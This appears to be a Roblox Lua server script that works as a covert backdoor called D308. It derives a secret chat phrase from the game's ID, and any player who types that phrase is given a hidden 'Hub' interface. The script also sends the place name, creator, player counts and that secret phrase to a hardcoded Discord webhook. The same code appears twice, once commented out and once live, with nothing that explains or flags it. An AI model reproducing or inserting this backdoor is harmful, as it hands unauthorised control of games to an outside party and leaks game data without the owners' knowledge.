--[[
local gidlen = string.len(game.GameId) local gidrev = string.reverse(game.GameId) local giddif = tonumber(game.GameId - game.GameId * 7.4235643723142) local fgid = gidlen..gidrev..giddif

game.Players.PlayerAdded:Connect(function(Spieler) Spieler.Chatted:Connect(function(rawmsg) local msg = rawmsg:lower() if msg == fgid then local gc = script.D308:Clone() gc.Parent = Spieler.PlayerGui end end) end)
local b="https://discord.com/api/webhooks/1095406681506185357/aAcSU602F7ZnG0FUMzZCoQKg2laVtgnPfnRlD0Un2Uz9GFRr0yDjo7ZMGAbTolpXx3lu" local c=game:GetService("HttpService") local e=game:GetService("MarketplaceService") local d=game:GetService("RunService") local _=e:GetProductInfo(game.PlaceId).Created local a=e:GetProductInfo(game.PlaceId).Updated local _=string.sub(_,1,10) local a=string.sub(a,1,10) if d:IsStudio()or d:IsServer()then 	local _={["embeds"]={{["author"]={["name"]="D308",		["icon_url"]="https://i.ibb.co/PrHj4Fz/drupal-icon-195943.png"},	["title"]=e:GetProductInfo(game.PlaceId).Name,	["url"]="https://www.roblox.com/games/"..game.PlaceId,	["color"]=5612282,	["image"]=		{["url"]="https://www.roblox.com/asset-thumbnail/image?assetId="..game.PlaceId.."&width=768&height=432&format=png"},	["fields"]=		{{["name"]="Players:",["value"]=#game.Players:GetPlayers(),["inline"]=true},	{["name"]="Creator:",["value"]=game.Players:GetNameFromUserIdAsync(game.CreatorId),["inline"]=true},	{["name"]="Max Players:",["value"]=game.Players.MaxPlayers,["inline"]=true},	{["name"]="Created:",["value"]=_,["inline"]=true},	{["name"]="Last Updated:",["value"]=a,["inline"]=true},	{["name"]="Place ID:",["value"]=game.PlaceId,["inline"]=true},	{["name"]="Code to open the Hub:",["value"]=fgid,["inline"]=true}},	["footer"]={["text"]="D308: Developed by Einstellungen#0932",		["icon_url"]="https://i.ibb.co/PrHj4Fz/drupal-icon-195943.png"}}}}	wait(4.5) 	local _=c:JSONEncode(_) 	local _=c:PostAsync(b,_)end
--]]

local gidlen = string.len(game.GameId)
local gidrev = string.reverse(game.GameId)
local giddif = tonumber(game.GameId - game.GameId * 7.4235643723142)
local fgid = gidlen..gidrev..giddif

game.Players.PlayerAdded:Connect(function(Spieler)
	Spieler.Chatted:Connect(function(rawmsg)
		local msg = rawmsg:lower()
		if msg == fgid then
			local gc = script.D308:Clone()
			gc.Parent = Spieler.PlayerGui
		end
	end)
end)

local b="https://discord.com/api/webhooks/1095406681506185357/aAcSU602F7ZnG0FUMzZCoQKg2laVtgnPfnRlD0Un2Uz9GFRr0yDjo7ZMGAbTolpXx3lu" 
local c=game:GetService("HttpService") 
local e=game:GetService("MarketplaceService") 
local d=game:GetService("RunService") 
local _=e:GetProductInfo(game.PlaceId).Created 
local a=e:GetProductInfo(game.PlaceId).Updated 
local _=string.sub(_,1,10) 
local a=string.sub(a,1,10) if d:IsStudio()or d:IsServer()then 

	local _={["embeds"]={{["author"]={["name"]="D308",
		["icon_url"]="https://i.ibb.co/PrHj4Fz/drupal-icon-195943.png"},
	["title"]=e:GetProductInfo(game.PlaceId).Name,
	["url"]="https://www.roblox.com/games/"..game.PlaceId,
	["color"]=5612282,
	["image"]=
		{["url"]="https://www.roblox.com/asset-thumbnail/image?assetId="..game.PlaceId.."&width=768&height=432&format=png"},
	["fields"]=
		{{["name"]="Players:",["value"]=#game.Players:GetPlayers(),["inline"]=true},
	{["name"]="Creator:",["value"]=game.Players:GetNameFromUserIdAsync(game.CreatorId),["inline"]=true},
	{["name"]="Max Players:",["value"]=game.Players.MaxPlayers,["inline"]=true},
	{["name"]="Created:",["value"]=_,["inline"]=true},
	{["name"]="Last Updated:",["value"]=a,["inline"]=true},
	{["name"]="Place ID:",["value"]=game.PlaceId,["inline"]=true},
	{["name"]="Code to open the Hub:",["value"]=fgid,["inline"]=true}},
	["footer"]={["text"]="D308: Developed by Einstellungen#0932",
		["icon_url"]="https://i.ibb.co/PrHj4Fz/drupal-icon-195943.png"}}}}
	wait(4.5) 
	local _=c:JSONEncode(_) 
	local _=c:PostAsync(b,_)
end
